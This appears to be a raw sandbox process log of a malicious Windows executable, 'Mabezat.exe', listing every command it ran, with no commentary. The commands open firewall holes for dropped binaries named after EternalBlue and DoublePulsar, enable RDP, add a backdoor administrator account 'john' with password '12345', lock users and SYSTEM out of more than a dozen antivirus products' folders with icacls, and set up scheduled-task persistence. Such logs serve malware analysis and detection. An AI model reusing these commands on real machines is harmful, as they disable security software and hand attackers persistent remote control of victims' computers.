"C:\Users\Admin\Downloads\Mabezat.exe"

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN

C:\Users\Admin\Downloads\Mabezat.exe

"C:\Users\Admin\Downloads\Mabezat.exe"

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\svchost.exe" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Zaxar" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls c:\programdata\Malwarebytes /deny Admin:(F)

C:\Windows\SysWOW64\icacls.exe

icacls c:\programdata\Malwarebytes /deny System:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\MB3Install /deny Admin:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\MB3Install /deny System:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)

C:\programdata\microsoft\intel\R8.exe

C:\programdata\microsoft\intel\R8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "

C:\Windows\SysWOW64\icacls.exe

icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im Rar.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\KVRT_Data /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im Rar.exe

C:\Windows\SysWOW64\timeout.exe

timeout 3

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)

C:\ProgramData\Microsoft\Intel\winlog.exe

C:\ProgramData\Microsoft\Intel\winlog.exe -p123

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)

C:\ProgramData\Microsoft\Intel\winlogon.exe

"C:\ProgramData\Microsoft\Intel\winlogon.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5FC5.tmp\5FC6.bat C:\ProgramData\Microsoft\Intel\winlogon.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6308,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=4568 /prefetch:8

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\chcp.com

chcp 1251

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)

C:\rdp\Rar.exe

"Rar.exe" e -p555 db.rar

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im Rar.exe

C:\Windows\SysWOW64\timeout.exe

timeout 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\timeout.exe

timeout 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Programdata\RealtekHD\taskhostw.exe

C:\Programdata\RealtekHD\taskhostw.exe

C:\Windows\SysWOW64\netsh.exe

netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)

C:\ProgramData\RealtekHD\taskhostw.exe

C:\ProgramData\RealtekHD\taskhostw.exe

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\net.exe

net.exe user "john" "12345" /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 user "john" "12345" /add

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\chcp.com

chcp 1251

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\net.exe

net localgroup "Администраторы" "John" /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Администраторы" "John" /add

C:\Windows\SysWOW64\net.exe

net localgroup "Administratorzy" "John" /add

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\net.exe

net localgroup "Administrators" John /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Administrators" John /add

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\net.exe

net localgroup "Administradores" John /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Administradores" John /add

C:\Windows\SysWOW64\net.exe

net localgroup "Пользователи удаленного рабочего стола" John /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add

C:\Windows\SysWOW64\net.exe

net localgroup "Пользователи удаленного управления" John /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\net.exe

net localgroup "Remote Desktop Users" John /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add

C:\Windows\SysWOW64\net.exe

net localgroup "Usuarios de escritorio remoto" John /add

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add

C:\Windows\SysWOW64\net.exe

net localgroup "Uzytkownicy pulpitu zdalnego" John /add

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add

C:\rdp\RDPWInst.exe

"RDPWInst.exe" -i -o

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -s TermService

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Programdata\WindowsTask\winlogon.exe

C:\Programdata\WindowsTask\winlogon.exe

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /C schtasks /query /fo list

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\schtasks.exe

schtasks /query /fo list

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -s TermService

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\schtasks.exe

